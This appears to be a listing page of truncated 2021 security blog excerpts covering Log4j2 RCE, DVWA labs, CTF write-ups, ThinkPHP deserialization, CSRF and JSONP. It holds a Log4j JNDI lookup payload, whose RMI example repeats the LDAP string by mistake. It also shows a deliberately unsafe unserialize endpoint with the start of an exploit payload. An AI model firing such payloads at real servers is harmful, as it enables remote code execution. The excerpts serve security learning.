[vulnerability] log4j2 remote code execution and actual code reproduction

Vulnerability principle: 1. The attack disguises a request body containing JNDI executable services. Here I mainly try LDAP and RMI. The request URLs are as follows: LDAP: ${jndi:ldap://127.0.0.1:1389/hello} RMI: ${jndi:ldap://127.0.0.1:1389/hello} 2. When the application happens to log the request header or input parameters, it will ...

Posted by dominod on Sat, 11 Dec 2021 10:13:56 +0100

DVWA level 8: SQL Injection (Blind)

Catalogue: Low, Medium, High, Impossible. SQL Injection (Blind), that is, blind SQL injection, differs from general injection in that with general injection the attacker can directly see the execution result of the injected statement on the page, while during blind injection, the attacker usually cannot obtain the execution result from the ...

Posted by dmcke5 on Wed, 08 Dec 2021 21:11:46 +0100

DVWA Level 6: Insecure CAPTCHA (Insecure Authentication Code)

Catalogue: Low, Medium, High, Impossible. Insecure CAPTCHA means an unsafe authentication code. CAPTCHA is short for Completely Automated Public Turing Test to Tell Computers and Humans Apart, a Turing test that automatically distinguishes computers from humans. However, I think it would be better to call the content of this module an unsafe verif ...

Posted by coollog on Tue, 07 Dec 2021 19:15:47 +0100

Ganwangbei 2021 CTF---Misc&WebWriteup

Preface: How to evaluate the 2021 dai Lian cup? My evaluation is "immortals fight, mortals suffer". Misc: Misc1-decodemaster. After getting the title, open the Word file and find that it is a string of random codes in the Wingdings 2 font. Modify the font and find that the font can be displayed normally when it is in bold ( ...

Posted by 9902468 on Tue, 07 Dec 2021 10:46:33 +0100

Implementation of springboot web application security policy

Background: Recently, the project has been launched, and Party A requires it to pass a security inspection before acceptance. Therefore, a series of security hardening measures has been carried out for the system according to the scanning results. This paper introduces some common security problems and protection strategies, and provides corresponding solut ...

Posted by dcf1023 on Sun, 05 Dec 2021 00:50:33 +0100

ThinkPHP5.0.24_ Analysis of deserialization vulnerability in Linux

ThinkPHP5.0.24 vulnerability code: <?php namespace app\index\controller; class Index { public function test01(){ $code = $_POST['code']; unserialize(base64_decode($code)); } } Payload: /index.php/index/index/test01 POST code=TzoyNzoidGhpbmtccHJvY2Vzc1xwa ...

Posted by trevorturtle on Mon, 22 Nov 2021 06:40:53 +0100

Problems of PHP high-end factory

Summary seen by boss: General PHP interviews will ask about front-end knowledge, especially VUE, so you need to know some front-end content. PHP: What are CSRF and XSS attacks? Answer: 1. CSRF basic concept, abbreviation and full name: CSRF (Cross-site request forgery). 2. CSRF attack principle: User is a website A ...

Posted by ubaldc36 on Sat, 20 Nov 2021 08:55:56 +0100

Introduction to ctfshow Web - deserialization (previous)

Catalogue: web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267. web254: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ ...

Posted by LucienFB on Sun, 24 Oct 2021 12:24:58 +0200

Springboot web project uses TrueLicense to realize software authentication and license - server side

1. Introduction to License: A license is the copyright license, which is generally used for the access license certificate provided by the charging software to the paying user. According to different application deployment locations, it can be divided into the following two situations: The application is deployed on the developer's own ECs. In ...

Posted by PHPGuru_2700 on Tue, 12 Oct 2021 23:56:58 +0200

On cross domain vulnerabilities of JSONP

CSRF (Cross-site request forgery) is an attack method that hijacks the user to perform unintentional operations on the currently logged in Web application. Compared with XSS, XSS uses the trust of the website to the user, and CSRF uses the trust of the website to the user's Web browser. When it comes t ...

Posted by ash4u on Tue, 12 Oct 2021 02:12:01 +0200